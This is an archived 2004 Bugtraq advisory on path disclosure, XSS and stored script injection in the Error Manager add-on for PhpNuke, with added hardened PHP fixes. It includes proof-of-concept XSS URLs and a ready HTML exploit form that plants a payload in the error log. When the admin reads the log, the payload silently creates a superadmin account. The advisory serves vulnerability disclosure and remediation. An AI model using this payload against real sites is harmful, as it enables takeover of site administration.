
List:       bugtraq
Subject:    [waraxe-2004-SA#010 - Multiple vulnerabilities in Error Manager
From:       Janek Vind <come2waraxe () yahoo ! com>
Date:       2004-03-18 17:02:29
Message-ID: 20040318170229.17259.qmail () search ! securityfocus ! com

{================================================================================}
{                              [waraxe-2004-SA#010]                              }
{================================================================================}
{                                                                                }
{          [ Multiple vulnerabilities in Error Manager v2.1 for PhpNuke ]        }
{                                                                                }
{================================================================================}
                
Author: Janek Vind "waraxe"
Date: 18. March 2004
Location: Estonia, Tartu



Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From developer's readme file:

This Error Manager is made by Gijza.net
The idea came from DR3N.tk
This addon is made for PHP-NUKE 6.0. but may work for other versions
Admin CP is also included in this version.
For the latest version go to www.gijza.net


Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1. Full path disclosure 


Let's look at the original code:

// language
if( isset( $newlang ) ) {
   include( "language/error/lang-$newlang.php" );
   $language = $newlang;
} elseif ( isset( $lang ) ) {
   include( "language/error/lang-$lang.php" );
   $language = $lang;
} else {
   include( "language/error/lang-$language.php" );
}

So nothing stops us from requesting this PHP file directly with an arbitrary
$newlang value, and the resulting standard PHP warning reveals the full path to
error.php:

http://localhost/nuke71/error.php?newlang=foobar

Warning: main(language/error/lang-foobar.php): failed to open stream: No such file or directory in D:\apache_wwwroot\nuke71\error.php on line 19



2. Cross-Site Scripting aka XSS


Again, let's look at the original code:


if ($error == 401) {
   $pagetitle = "- "._EM401."";
}
if ($error == 403) {
   $pagetitle = "- "._EM403."";
}
if ($error == 404) {
   $pagetitle = "- "._EM404."";
}
if ($error == 500) {
   $pagetitle = "- "._EM500."";
}


This is traditionally coded with a "switch/case" construct, but for some reason the
author uses a chain of independent "if" statements here, not even
"if/elseif/elseif/else". As a result, if the variable $error is not 401, 403, 404 or
500 but something else, $pagetitle is left UNINITIALIZED and we can set it to any
value from the request. This of course leads to XSS:

http://localhost/nuke71/error.php?pagetitle=[xss code here]


One more way to exploit the XSS:


http://localhost/nuke71/error.php?error=>[xss code here]
 

As with all PhpNuke XSS cases, using POST parameters, or better still COOKIE
parameters, is preferable, because GET parameters are strictly filtered in
mainfile.php.
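For comparison, here is a hardened counterpart to the two error.php fragments quoted above. This is an added example, not Error Manager's own code; it assumes the language files live in language/error/ as in the original, that the _EM* constants are defined by the included language file, and that a language named "english" ships with the add-on (a hypothetical fallback name).

```php
<?php
// Hardened rewrite of the language selection and page-title logic from
// error.php (added example, not the add-on's code).

// 1. Language selection: accept only a short lowercase name that matches a
//    file which actually exists, so a bogus value can neither include an
//    arbitrary path nor trigger a warning that leaks the install directory.
function pick_language($newlang, $lang, $default)
{
    foreach (array($newlang, $lang, $default) as $candidate) {
        if (is_string($candidate)
            && preg_match('/^[a-z]{2,16}$/', $candidate)
            && is_file("language/error/lang-$candidate.php")) {
            return $candidate;
        }
    }
    return 'english'; // hypothetical fallback; must ship with the add-on
}

// 2. Page title: derived only from a fixed table keyed by the numeric code.
//    $pagetitle is always assigned here, so a value handed in from the
//    request can never survive, and an unknown code gets a neutral title.
function error_title($error)
{
    // _EM401 etc. are defined by the language file included below
    $titles = array(401 => _EM401, 403 => _EM403, 404 => _EM404, 500 => _EM500);
    $code = (int) $error; // ">[xss code]" becomes 0, i.e. unknown
    return isset($titles[$code]) ? '- ' . $titles[$code] : '- Error';
}

$language = pick_language(isset($_REQUEST['newlang']) ? $_REQUEST['newlang'] : null,
                          isset($_REQUEST['lang']) ? $_REQUEST['lang'] : null,
                          isset($language) ? $language : null);
include "language/error/lang-$language.php";

$pagetitle = error_title(isset($_REQUEST['error']) ? $_REQUEST['error'] : 0);
// Escape at output time as well, in case a title string is ever user-influenced.
echo '<title>' . htmlspecialchars($pagetitle, ENT_QUOTES) . '</title>';
```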



3. Script injection into the error log (nasty one!)


This one is my favourite bug. I mean, Error Manager is supposed to log error
conditions on the web server so that the admin can find potential bugs on the site,
and of course this logging feature will reveal to the admin many (unsuccessful)
attacks by "bad guys". It's a shame, but it's true: error logging in Error Manager
logs the referer, request URI, etc., but WITHOUT ANY sanitizing of HTML tags ;) So we
can inject arbitrary JavaScript into the error log, and when the admin browses the
logs the website can be compromised: for example cookies can be stolen, additional
superadmin accounts can be created without the knowledge of the admin (reference:
[waraxe-2004-SA#008 - easy way to get superadmin rights in PhpNuke 6.x-7.1.0]), etc.

So, here is an attack scenario:

Write an HTML file like this one:


<HTML>
<HEAD><TITLE>Error Manager sploit</TITLE>
</HEAD>
<BODY bgcolor="#000000" text="#FFFFFF">
<br><br><br>
<center>

<FORM action="http://www.victim.com/error.php" method="POST">

<input type="hidden" name="error" value="<img width='0' height='0' border='0' src='http://www.victim.com/admin.php?op=AddAuthor&add_aid=attacker&add_name=God&add_pwd=coolpass&add_email=kala@hot.ee&add_radminsuper=1'></img>404">
 <input type="submit" value="Attack">

</FORM>

</center>
<br><br><br>

</BODY>
</HTML>


Use it against the victim server, then just wait until the admin reads the error log,
and then log in to your brand new superadmin account ;)
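The root cause in this section is log data being written and displayed without output escaping. The following is an added example of a log writer and admin-side log viewer that neutralise it; it is not the add-on's own code, and it assumes a flat tab-separated log file at a hypothetical path, since the advisory does not show how Error Manager actually stores its log.

```php
<?php
// Logging and log display with output escaping (added example, not the
// add-on's own code). Assumes a flat tab-separated text log file.

define('EM_LOG', 'error_manager.log'); // hypothetical log file path

// Record one error hit. In the real handler $uri and $referer would come
// from $_SERVER['REQUEST_URI'] and $_SERVER['HTTP_REFERER']. Line breaks and
// tabs are stripped so a single request cannot forge extra rows in the log.
function em_log_error($code, $uri, $referer, $ip)
{
    $fields = array(date('c'), (int) $code, $ip, $uri, $referer);
    foreach ($fields as $i => $f) {
        $fields[$i] = str_replace(array("\r", "\n", "\t"), ' ', (string) $f);
    }
    $fp = fopen(EM_LOG, 'a');
    if ($fp) {
        flock($fp, LOCK_EX);
        fwrite($fp, implode("\t", $fields) . "\n");
        fclose($fp); // releases the lock
    }
}

// Render the log for the admin panel. Every cell goes through
// htmlspecialchars, so a tag smuggled into the referer or request URI is
// shown as literal text instead of executing in the admin's browser.
function em_render_log()
{
    $html = "<table>\n<tr><th>time</th><th>code</th><th>ip</th><th>uri</th><th>referer</th></tr>\n";
    $lines = file(EM_LOG);
    foreach ($lines ? $lines : array() as $line) {
        $cells = explode("\t", rtrim($line, "\r\n"));
        foreach ($cells as $i => $c) {
            $cells[$i] = htmlspecialchars($c, ENT_QUOTES);
        }
        $html .= '<tr><td>' . implode('</td><td>', $cells) . "</td></tr>\n";
    }
    return $html . "</table>\n";
}

// Constructed sample hit whose referer carries a script tag.
em_log_error(404, '/error.php?error=404', "<script>alert('xss')</script>", '192.0.2.10');
echo em_render_log();
```

The referer cell of the sample row is emitted with its angle brackets and quotes entity-encoded, so the admin sees the tag as text rather than having it run.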




Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    Greets to torufoorum staff and to all IT security related people in Estonia!
Greetings! Special greets to ulljobu!


Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    come2waraxe@yahoo.com
    Janek Vind "waraxe"

---------------------------------- [ EOF ] ------------------------------------
